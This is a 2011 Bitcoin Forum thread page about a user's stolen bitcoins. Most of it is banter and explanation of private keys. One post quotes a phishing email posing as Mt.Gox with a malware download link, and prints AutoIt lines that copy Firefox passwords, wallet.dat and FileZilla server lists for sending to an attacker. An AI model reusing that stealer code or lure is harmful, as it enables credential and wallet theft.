Bitcoin Forum
March 19, 2024, 10:16:53 AM *
News: Latest Bitcoin Core release: 26.0 [Torrent]

Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 [6]  All
  Print  
Author Topic: ALL of my bitcoins stolen (Around 60) . What the F*CK.  (Read 16724 times)
elggawf

Activity: 308
Merit: 250

View Profile
June 28, 2011, 02:17:38 AM

Yes, exactly my point.  It seems the system would be greatly improved if the sender had the ability to "verify" a transaction.  Thus, my money could only be used by me (when I verify it) and then it becomes yours.

You verify it with your private key... so don't lose your private key.

^_^
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
allinvain
Legendary

Activity: 3080
Merit: 1080

View Profile WWW
June 29, 2011, 07:38:56 AM

OP did you make any progress?

TraderTimm
Legendary

Activity: 2408
Merit: 1121

View Profile
June 29, 2011, 02:43:25 PM

Yeah OP, is there anything the patron saint of wallet-fail can do for you?

fortitudinem multis - catenum regit omnia
presha

Activity: 35
Merit: 0

View Profile
June 29, 2011, 09:52:46 PM

did u have a dropbox account with your wallet stored? if yes, you got the solution
bitcoinminer

Activity: 322
Merit: 252

View Profile
June 29, 2011, 09:57:32 PM

I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol

Be fearful when others are greedy, and greedy when others are fearful.

-Warren Buffett
Oldminer
Legendary

Activity: 1022
Merit: 1001

View Profile
June 29, 2011, 10:07:21 PM

I DONT UNDERSTAND!!!!111!! I PUT MY PIN CODE INSIDE THE JACKET OF MY ATM CARD SO NO ONE CAN SEE IT! HOW DID MY MONEY GET STOLEN!?!?!?!

lol

Bizarre!

If you like my post please feel free to give me some positive rep https://bitcointalk.org/index.php?action=trust;u=18639
Tip me BTC: 1FBmoYijXVizfYk25CpiN8Eds9J6YiRDaX
Man From The Future

Activity: 371

View Profile
June 29, 2011, 10:11:19 PM

Yes, and in that sense Windows can provide the exact same protection, because even back in XP there was an option to encrypt/shut off your user directory, so that other users (even administrators) couldn't access it.

Is there any third party software that makes use of permissions in Windows like this effectively?  Is there a way to handle this type of usage case, even for versions of Windows without user configurable permissions (i.e. versions below Pro)?
As far as I know, it doesn't actually work, kust makes the stuff impossible to list, but if you know the name of a file, you can get it. That, or my school network does it wrong Smiley

THE ONE STOP SOLUTION FOR THE CRYPTO WORLD
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Facebook   /  Twitter   /  Reddit   /  Medium   /  Youtube   /
      ▄▄█████████▄▄
   ▄█████████████████▄
  █████▀▀  ███  ▀▀█████
 ████     █████     ████
████     ███████
███▀    ████ ████
███▄   ████   ████
████  ████▄▄▄▄▄████  ████
 ███████████████████████
  █████▄▄       ▄▄█████
   ▀█████████████████▀
      ▀▀█████████▀▀

▄██▀▀▀▀▀▀▀▀▀▀▀▀▀██▄
▄██▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██▄
▄█▀                       ▀█▄
▄▄▄▄ ▄█                           █▄ ▄▄▄▄
█   ███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀███   █
▀▀█▀                                 ▀█▀▀
▄▀                                     ▀▄
▄▄▀▄▄▄▄                                 ▄▄▄▄▀▄▄
█       ▀▀▄                           ▄▀▀       █
█          █                         █          █
█▀▀▄▄▄▄▄▄▄███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀███▄▄▄▄▄▄▄▀▀█
▒▀▄       ██▀▀▀▀▀▀▀▀▀▀▀▀█▀█▀▀▀▀▀▀▀▀▀▀▀▀██       ▄▀▒
▒█▀▀▀▀▄▄  █              ▀              █  ▄▄▀▀▀▀█▒
▒█      █ ▀▄                           ▄▀ █      █▒
▒▀▄▀▄▄▄▄▀  █▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀█  ▀▄▄▄▄▀▄▀▒
▒▒▒▀▄▄▄▄▄ █                             █ ▄▄▄▄▄▀▒▒▒
 ▒▒▒▒▒▒▀▀▀▀▀▄▄▄▄▄▄███████████████▄▄▄▄▄▄▀▀▀▀▒▒▒▒▒▒▒
██
██
██
██
██
██
██
██
██
██
██
██
allinvain
Legendary

Activity: 3080
Merit: 1080

View Profile WWW
June 30, 2011, 05:48:52 AM

Yeah OP, is there anything the patron saint of wallet-fail can do for you?

Would you just kindly FUCK OFF!! I'm tired of you trolling me on every post that I make you ignorant asshole!

Alex Beckenham

Activity: 154
Merit: 100

View Profile
June 30, 2011, 05:51:41 AM

lol

Was it 1077? The price of a cheese pizza and large soda?

Oldminer
Legendary

Activity: 1022
Merit: 1001

View Profile
June 30, 2011, 05:54:12 AM

Yea, which was all fine and dandy until the price of a cheese pizza and soda went up

If you like my post please feel free to give me some positive rep https://bitcointalk.org/index.php?action=trust;u=18639
Tip me BTC: 1FBmoYijXVizfYk25CpiN8Eds9J6YiRDaX
joepie91

Activity: 294

View Profile
July 04, 2011, 02:04:01 PM

You can only use a password to protect (= encrypt) the private keys. Once someone has those keys he can do what he wants.
Yes, exactly my point.  It seems the system would be greatly improved if the sender had the ability to "verify" a transaction.  Thus, my money could only be used by me (when I verify it) and then it becomes yours.

Such a system would make the Bitcoin extremely attractive!
That's not technically possible. That is what your private key does - it authorizes a transaction. You can put a transaction password on your client, but that doesn't do anything if someone steals your wallet.dat - because they can just use the wallet.dat in a client that does not have that protection. If you have the private keys, you can spend the bitcoins, and there is to the best of my knowledge no technically possible way to prevent that.

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.
bitcoinminer

Activity: 322
Merit: 252

View Profile
July 04, 2011, 10:43:48 PM

lol

+1 for the Futurama reference lol

Be fearful when others are greedy, and greedy when others are fearful.

-Warren Buffett
BCEmporium
Legendary

Activity: 1218
Merit: 1000

View Profile
July 04, 2011, 11:42:30 PM
Last edit: July 05, 2011, 12:03:00 AM by BCEmporium

You didn't fall for this email, did you:

Dear Mt.Gox user,

As i'm sure most of you are well aware, there has been a serious compromise of Mt. Gox's database.

We implore all of our users to take safety precautions to ensure their assets are not at risk, as your password may have been compromised

Please Follow the instructions here (Instructions are given by text and an image) : http://www.fileden.com/files/2011/6/17/3153783/Mt.Gox-Safety-Tutorials.rar

It is very important that you follow these instructions to prevent any further compromises on other sites that you browse.

Thanks,

The Mt.Gox team

BTW, how can you be confident about viruses, etc, if you have an unencrypted wallet and you lost all your BTC from it. I mean, really, think about it.

Sorry to go a bit offtopic, but the robber who created that virus really went hardcore; full time robber!
Here's what it goes after (it's an AutoIt script compiled and UPX packed):

Code:
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\key3.db", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\signons*", "C:\temp1\signons")
FileCopy(Execute(" @AppDataDir ") & "\bitcoin\" & "wallet.dat", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\filezilla\" & "recentservers.xml", "C:\temp1\")

And sends it to:

clintonlowe46@gmail.com

EDIT: For those wondering if are infected, look for a folder names "readme" with a file inside named ""READ-FIRST.txt", inside your AppData dir (C:\documents and settings\<user>\Application Data (2k/xp) - c:\users\<user>\AppData\Roaming (Vista/7))

██████████████████            ██████████
████████████████              ██████████
██████████████          ▄█   ███████████
████████████         ▄████   ███████████
██████████        ▄███████  ████████████
████████        ▄█████████  ████████████
██████        ▄███████████  ████████████
████       ▄██████████████ █████████████
██      ▄███████████████████████████████
▀        ███████████████████████████████
▄          █████████████████████████████
██▄         ▀███████████████████████████
████▄        ▀██████████████████████████
██████▄        ▀████████████████████████
████████▄        ████████████████▀ █████
██████████▄       ▀█████████████  ██████
████████████▄       ██████████   ███████
██████████████▄      ▀██████    ████████
████████████████▄▄     ███     █████████
███████████████████▄    ▀     ██████████
█████████████████████▄       ███████████
███████████████████████▄   ▄████████████

▄█████████████████   ███             ███   ███   ███▄                ▄███            █████            ████████████████   ████████████████▄             █████
███▀                 ███             ███   ███   ████▄              ▄████           ███████           ███                ███           ▀███           ███████
███                  ███             ███   ███   █████▄            ▄█████          ███▀ ▀███          ███                ███            ███          ███▀ ▀███
███                  ███             ███   ███   ███ ███▄        ▄███ ███        ▄███▀   ▀███▄        ███                ███           ▄███        ▄███▀   ▀███▄
███                  ███████████████████   ███   ███  ▀██▄      ▄██▀  ███       ▄███▀     ▀███▄       ████████████████   ████████████████▀        ▄███▀     ▀███▄
███                  ███             ███   ███   ███   ▀███    ███▀   ███      ▄███▀       ▀███▄      ███                ███        ███          ▄███▀       ▀███▄
███                  ███             ███   ███   ███    ▀███  ███▀    ███     ▄███▀         ▀███▄     ███                ███         ███        ▄███▀         ▀███▄
███▄                 ███             ███   ███   ███      ██████      ███    ▄███             ███▄    ███                ███          ███      ▄███             ███▄
▀█████████████████   ███             ███   ███   ███       ████       ███   ▄███               ███▄   ████████████████   ███           ███    ▄███               ███▄

|
  TRUE BLOCKCHAIN GAMING PLATFORM 
DECENTRALISED AUTONOMOUS UNIVERSES

HOME PAGE                                                                  WHITE PAPER 
|
Pages: « 1 2 3 4 5 [6]  All
  Print  

Jump to: